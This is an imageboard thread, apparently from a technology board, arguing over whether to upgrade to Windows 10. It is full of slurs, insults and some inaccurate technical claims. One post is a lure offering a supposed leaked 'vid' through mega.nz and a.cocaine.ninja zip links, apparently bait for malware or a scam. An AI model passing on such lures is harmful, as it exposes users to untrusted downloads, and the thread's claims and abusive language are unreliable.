So should i update to Windows 10? discuss

So should i update to Windows 10? discuss

Other urls found in this thread:

thurrott.com/windows/windows-10/3887/windows-10-upgrade-matrix-which-version-you-get-for-free
mega.nz/#!j9AlBDgC!0UcB-FS6A5ENFhQwY2uysQL_uFhhDM5Z4GKGzrylKX4
a.cocaine.ninja/zxjlyh.zip
support.microsoft.com/en-us/kb/3125574
twitter.com/SFWRedditImages

no

I'm using windows 7,i don't see a good why anyine should update

If you play games or use resource heavy programs then yes.

Direct x is the main reason.

yeah its full autism mode to complain about a fucking operating system

xp and 7 are the best in my opinion and if youre not using a tablet or something theres no need to update further than 7

Can you explain this?

its cute that you still think you have a choice

Xp was best

from 8 yes
from 7 no

So tru doe man

My computer did it automatically, i was so pissed, life just gave me another reason to end it

OP here, I would be upgrading from 7 and have had issues with 10 in the past

windows 10 makes me feel like im loaning my interface for my time spent at my personal computer

just turn off automatic updates

DirectX 12 support. 7 doesn't support DX12.

ive been using it since beta, and tbh im pretty happy with it. requires a little more tweaking then 7, but it has some nice stuff, and ruins really well.

Is that English, or is it tardese.

win 7 is way more than enough for anything i use it for and win xp before was great, too. the fuckups vista and 8 and the great spy engine 10 are not that much better than the versions before for most users so you can completely ignore them.

i never tried win 3.11, but win 95 was alright i guess. it froze a bit to often, but win nt and 2000 fixed that issue. never came around using win me but win 98 was the win xp or win 7 of its time. most games worked, strong enough for most things to run smoothly, stable, no pain in the ass and not spying

maybe because its an american product?

from 8 i would downgrade to 7 tbqh

>ruins really well
yes it does

Oh, you are a retard, I get it.

8.1 is self-evidently better than 7.

unless you're using the enterprise edition of 7 and /or your PC is offline (which is unlikely), you might as well upgrade it to 10 right away, to avoid the hassle of being reminded and eventually forced to update when you're in the middle of something important. Kinda like death execution. Just get it over with right away.

Not a retard. A North Korean SPY!

yes me to probably, but that wasnt the question, and from his responses i think its someone that just wants to click go

Using win 7 ultimate

Nigga. You went full retard. Never go full retard.

patching a rushed shit operating system doesnt make it a good operating system it just makes it more bearable

Install it for gayming and run loonix in a vm for normal desktop (aka lurking on Sup Forums) use)

You're gonna have to no matter what.

My pc had W8.1 and I didn't like it coming from Vista. But I learned to use it. It auto upgraded to W10 and I haven't seen much difference since.

My wife was using W7. We tried to stop the W10 upgrade(s) but couldn't. Rolling back to W7 lasted about 10 days. Now she's having far more problems and I don't.

Looks like I gotta do a clean install of W10 on hers now.

thurrott.com/windows/windows-10/3887/windows-10-upgrade-matrix-which-version-you-get-for-free

Only Enterprise edition of 7 and 8 are excluded.

Win10 should be this.

Windows 10 isn't a bad operating system as long as you don't mind turning off all the invasive security settings once a month whenever it updates.

top kek

i think that was you with your response that went full retard

I've got Windows 8.1

Would I have to download my Adobe creative cloud again if I update to ten? Will it wipe everything and start fresh?

short answer, yes

long answer yeeeeeeeeeeeeeeeeeees

People hated 8 because of the UI. When that was changed in 8.1 that made it better than 7 in every way.

If you can't figure that out then recommending an OS to someone is out of your depth.

I have a choice.

Same for my cousin, and it ruined his OS, he have to buy a new one now because he didn't archived it...

for99% of the people the OI
>is
the OS

fuck no.its a mess. it uploads updates to other users without asking you wich creates huge traffic. and if you have linux installed on the same pc it will wreck the grub menue and you cant start at all anymore neither windows nor linux untill you fix it. I had less problems with fucking windows 8 than I have now.

no it wont
get off windows 8 its vista with a ego
its also a good time to upgrade most of the upgrading kinks have gone

also disconnect the internet when the upgrade is downloaded, the updates take for ever while upgrading and only upto 10mins after installed

If you have a 4k monitor then you basically have no choice but to upgrade to Win10. Otherwise your UI will be tiny as shit and almost unusable.

win 10 = dx 12. you don't have a choice

finally someone with half a brain

you can use DX11....

you know shit

I am very conflicted here guys, couldnt you all just agree on something?

A teacher I had said the average PC can be infected with some type of virus or malware within one minute of connecting to the internet once booted for the first time. I personally would not skip the during upgrade updates to save time because I feel like you might end up paying for that in a different way.

>never10
Fug u Bill

This is Sup Forums.

We can't even agree to disagree.

>welcome

((()))

You could also use a sempron 64 to game with if you're into old technology that isn't as good as the new stuff.

8885 So this got into the local news and I have the vid.. Please don't blackmail her First name: Daniel Link to download: 1) mega.nz/#!j9AlBDgC!0UcB-FS6A5ENFhQwY2uysQL_uFhhDM5Z4GKGzrylKX4 2) a.cocaine.ninja/zxjlyh.zip Files are auto removed after 100 downloads

Thanks for the info

This nigger ought to get banned already, do your cunting jobs, useless cuck nigger mods.

Nah. The fact that they have to do all kinds of underhanded shit to get people to upgrade should tip you off.

>needing a program to disable updates

hahaohwow.jpg

moron
if you updated to windows 7 now youd have atleast 240 updates before upto date, so how would you do them without connecting to the net

2 things, its directly getting the updates from microsoft without going thru a browser and the upgrade leaves the antivirus intact and working

windows 7 was the ultimate windows operating system

especially windows 7 ultimate

But xp had customizable folder backgrounds
Xp masterrace

I said DONT disconnect the internet during an upgrade to 10 because it isn't as safe. Should read more books and stuff.

Just a shame that Wine sucks and Microsoft doesn't publish their API as a platform independent runtime environment. I'd even pay for it.

support.microsoft.com/en-us/kb/3125574

>windows

lmao plebs, arch linux master race reporting in

Windows ME was worse than vista.
Its the only opperating system that became progressively more and more un stable and un useable with ever sucessive reboot.

yes but this was a very recent addition to what was on offer udating win7

basically you are an idiot, and its not you the moron i should be arguing with, its the dick that got paid to teach you fuck all

Vista is the best OS. I have an Alien ware area 51 and downgraded it to vista 64 bit because it's amazing

Look, i replied to advice about upgrading offline then connecting to update which would then only take about 10 minutes. You don't sound like that original poster, you just sound fucking angry like someone just fucked your wife and now she's leaving you or something.

is that why they needed to make it 8.1? because its better? or is it because 8 sucked so much doodle that they needed to fix it (in which case its a polished turd)

"My wife was using W7. We tried to stop the W10 upgrade(s) but couldn't."

you couldn't disable automatic updates... the thing it asks you when you install it? no you just have no idea how to computer

still using win 7 enterprise (its still supported) still winning

20 year IT professional here. You have absolutely no idea what you are talking about or you're a serious troll.

Shit analogy. DX12 isn't that much better. It's like your bragging over your x12 cd rom because your buddy has a x8.

i have windows 8.1 and it never asks me to update to windows 10, because i disabled the updating software. it can't update even if it wanted to

>you couldn't disable automatic updates..
Yeah I did fuckwad.
It still installed itself.

Do a little Googling and you'll see how it's happening.

BTW - when they stop upgrading W7 - which they will before '20 - you'll be fucked and have to buy W10.

but xp is very slow os, even u change your hdd to ssd it will keep slow, win 10 is fastest os of microsoft. also xp has a lot bugs and security problems, it cant handle with autorun.inf virus, also there are a lot of viruses for xp, when you put your ethernet cable to your no antivirus pc, in 10 sec you will have 846466 million viruses :)

No
t.windows 7 haver

You will now use this as your desktop, it's a self fulfilling prophecy.

then you didn't disable it, to disable system updates you had to disable the windows update manager.